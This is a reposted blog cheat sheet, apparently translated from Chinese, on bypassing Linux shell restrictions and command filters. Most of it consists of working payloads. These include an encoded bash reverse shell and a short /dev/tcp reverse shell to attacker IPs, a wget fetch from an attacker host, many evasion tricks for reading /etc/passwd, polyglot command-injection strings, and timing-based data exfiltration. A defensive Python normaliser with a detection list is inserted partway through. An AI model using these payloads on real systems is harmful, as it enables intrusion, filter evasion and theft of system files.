Bypassing Linux Shell Restrictions
2022-10-8 08:9:18 Author: 系统安全运维

Common real-world bypasses
Reverse Shell
# Double-Base64 is a way to avoid characters like "+". It works about 90% of the time.
echo "echo $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h" | sed 's/ /${IFS}/g'
#echo\WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4TkM0NEx6UTBORFFnTUQ0bU1Rbz0K|ba''se''6''4${IFS}-''d|ba''se''64${IFS}-''d|b''a''s''h
Short reverse shell
# Trick from Dikline
# Get a rev shell with:
(sh)0>/dev/tcp/10.10.10.10/443
# Then get the output of the rev shell by executing inside it:
exec >&0
Bypass paths and forbidden words
# Question mark binary substitution
/usr/bin/p?ng # /usr/bin/ping
nma? -p 80 localhost # /usr/bin/nmap -p 80 localhost
# Wildcard (*) binary substitution
/usr/bin/who*mi # /usr/bin/whoami
# Wildcard + local directory argument
touch -- -la # -- stops processing options after the --
ls *
# [chars]
/usr/bin/n[c] # /usr/bin/nc
# Quotes / concatenation
'p'i'n'g # ping
"w"h"o"a"m"i # whoami
\u\n\a\m\e \-\a # uname -a
ech''o test # echo test
ech""o test # echo test
bas''e64 # base64
/\b\i\n/////s\h # /bin/sh
# Execution through $0
echo whoami|$0
# Uninitialized variables: an uninitialized variable equals null (nothing)
cat$u /etc$u/passwd$u # Use the uninitialized variable without {} before any symbol
p${u}i${u}n${u}g # Equals ping; use {} to put the uninitialized variable between valid characters
# Fake commands
p$(u)i$(u)n$(u)g # Equals ping, but 3 errors trying to execute "u" are shown
w`u`h`u`o`u`a`u`m`u`i # Equals whoami, but 5 errors trying to execute "u" are shown
# Concatenation of strings using history
!-1 # This will be substituted by the last command executed, and !-2 by the penultimate command
mi # This will throw an error
whoa # This will throw an error
!-1!-2 # This will execute whoami
Bypass forbidden spaces
# {form}
{cat,lol.txt} # cat lol.txt
{echo,test} # echo test
# IFS - Internal field separator; change " " for any other character ("]" in this case)
cat${IFS}/etc/passwd # cat /etc/passwd
cat$IFS/etc/passwd # cat /etc/passwd
# Put the command line in a variable and then execute it
IFS=];b=wget]10.10.14.21:53/lol]-P]/tmp;$b
IFS=];b=cat]/etc/passwd;$b # Using 2 ";"
IFS=,;`cat<<<cat,/etc/passwd` # Using cat twice
# Other way: just change each space for ${IFS}
echo${IFS}test
# Using hex format
X=$'cat\x20/etc/passwd'&&$X
# New lines
p\
i\
n\
g # These 4 lines will equal ping
# Undefined variables and !
$u $u # This will be saved in the history and can be used as a space; notice that the $u variable is undefined
uname!-1\-a # This equals uname -a
Bypass backslash and slash
cat ${HOME:0:1}etc${HOME:0:1}passwd
cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd
Bypass with hex encoding
echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
cat `echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"`
abc=$'\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64';cat $abc
`echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'`
cat `xxd -r -p <<< 2f6574632f706173737764`
xxd -r -ps <(echo 2f6574632f706173737764)
cat `xxd -r -ps <(echo 2f6574632f706173737764)`
Bypass IPs
# Decimal IPs
127.0.0.1 == 2130706433
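As an added defensive example that is not part of the original article: the Python normaliser below heuristically undoes the layers shown in the forbidden-words, forbidden-spaces, hex-encoding and decimal-IP sections above, so that a plain rule can match the underlying command in shell audit logs. The sample log lines, the assumption that `u` is an unset variable, and the rule list are constructed for the example.

```python
import re

# Constructed sample command-log lines exercising the obfuscation tricks above.
SAMPLE_CMDS = [
    "c''a''t${IFS}/etc$u/passwd$u",      # empty quotes + ${IFS} + unset variable
    "\\u\\n\\a\\m\\e \\-\\a",            # backslash-escaped letters
    "X=$'cat\\x20/etc/passwd'&&$X",      # ANSI-C hex quoting run via a variable
    "IFS=];b=cat]/etc/passwd;$b",        # custom IFS used as the separator
    "p${u}i${u}n${u}g 2130706433",       # unset variable + decimal IP
    "{cat,/etc/passwd}",                  # brace expansion form
    "ls -la /tmp",                        # benign
]
SUSPICIOUS = ("/etc/passwd", "/dev/tcp/", "bash -i", "base64 -d")  # assumed rule list

def _dec_ip(m):
    n = int(m.group(0))
    if n > 0xFFFFFFFF:
        return m.group(0)
    return ".".join(str((n >> b) & 255) for b in (24, 16, 8, 0))

def normalize_shell(cmd, unset_vars=("u",)):
    """Heuristically peel off the bypass layers to recover the plain command."""
    # Not handled: globs (who*mi) and history (!-1) need filesystem/session state.
    s = re.sub(r"\$'((?:[^'\\]|\\.)*)'",            # $'cat\x20...' ANSI-C quoting
               lambda m: re.sub(r"\\x([0-9a-fA-F]{2})",
                                lambda h: chr(int(h.group(1), 16)), m.group(1)), cmd)
    ifs, assigns = " ", {}                          # inline NAME=value; IFS=] changes the separator
    for name, val in re.findall(r"(?:^|[;&|])(\w+)=([^;&|]*)", s):
        if name == "IFS":
            ifs = val or " "
        else:
            assigns[name] = val
    s = re.sub(r"(?:^|(?<=[;&|]))\w+=[^;&|]*", "", s)
    for name, val in assigns.items():               # $X / ${X} -> value, IFS char -> space
        s = re.sub(r"\$(?:\{%s\}|%s\b)" % (name, name), lambda _: val.replace(ifs, " "), s)
    s = re.sub(r"\$(?:\{IFS\}|IFS\b)", " ", s)
    for name in unset_vars:                         # $u / ${u} expand to nothing
        s = re.sub(r"\$(?:\{%s\}|%s\b)" % (name, name), "", s)
    s = re.sub(r"\{([^{}]*,[^{}]*)\}", lambda m: m.group(1).replace(",", " "), s)
    s = s.replace("'", "").replace('"', "")         # 'p'i'n'g, ba''se''64
    s = re.sub(r"\\(.)", r"\1", s)                  # \u\n\a\m\e -> uname
    s = re.sub(r"\b\d{8,10}\b", _dec_ip, s)         # 2130706433 -> 127.0.0.1
    return re.sub(r"\s+", " ", s).strip(" ;&|")

def flag(cmd):
    """Return the suspicious fragments visible only after normalisation."""
    n = normalize_shell(cmd)
    return [p for p in SUSPICIOUS if p in n]
```

Run `flag(line)` over each collected command line; `flag("ls -la /tmp")` is empty while every obfuscated `/etc/passwd` read above is reported.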
Time-based data exfiltration
time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
DNS data exfiltration
You can use Burp Collaborator or pingb (http://pingb.in/)
Polyglot command injection
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
Read-only / no-exec bypass
If you are on a filesystem mounted read-only and no-exec, there are still ways to execute arbitrary binaries. One of them is DDexec.
For the details of its use and how it works, see
https://github.com/arget13/DDexec


Source: http://mp.weixin.qq.com/s?__biz=Mzk0NjE0NDc5OQ==&mid=2247510840&idx=2&sn=9a1d8117b0f5ef99ed16bc2850ba422d&chksm=c3087848f47ff15e411355b998e1b5378d674543372696ddfefc1cabb7cbd5f61dee2961bf30#rd